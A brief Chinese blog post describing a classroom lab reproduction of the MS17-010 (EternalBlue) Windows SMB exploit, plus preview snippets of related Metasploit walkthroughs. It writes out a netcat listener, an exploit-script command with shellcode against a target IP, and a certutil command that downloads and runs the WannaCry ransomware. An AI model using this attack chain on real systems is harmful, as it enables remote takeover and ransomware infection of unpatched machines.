很老的洞了,只是老師上課講了,我就復現一遍。
環境靶機為windows7
並且存在此漏洞
攻擊機需要python3
環境
nc –lvp 8888
python ms17-010.py –-host 192.168.217.2 –-file shellcode
只需這兩條命令,便可以利用成功,其中ms17-010.py
是nsa
洩露出來的指令碼
之後我們便可以通過windows
自帶的工具
certutil.exe -urlcache -split -f wannacry.exe
寫入病毒程式並且執行。
指令碼不提供
0.0
MS17 010漏洞復現
實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...
MS17 010 漏洞復現
開啟msf msfconsole fping a g 起始ip 結束ip 掃瞄當前區域網活躍ip fping a g 192.168.1.1 192.168.1.250 先輸入這條命令 gem install ruby smb然後,掃瞄內網有沒有ms17 010漏洞 use auxiliary sc...
MS17 010(永恆之藍)漏洞復現
永恆之藍是2017年4月14日晚,黑客團體shadow brokers 影子經紀人 公布的一大批網路攻擊工具中的其中乙個。永恆之藍 利用windows系統的smb漏洞可以獲取系統最高許可權。5月12日,不法分子通過改造 永恆之藍 製作了wannacry勒索病毒。實驗一 獲取windows serve...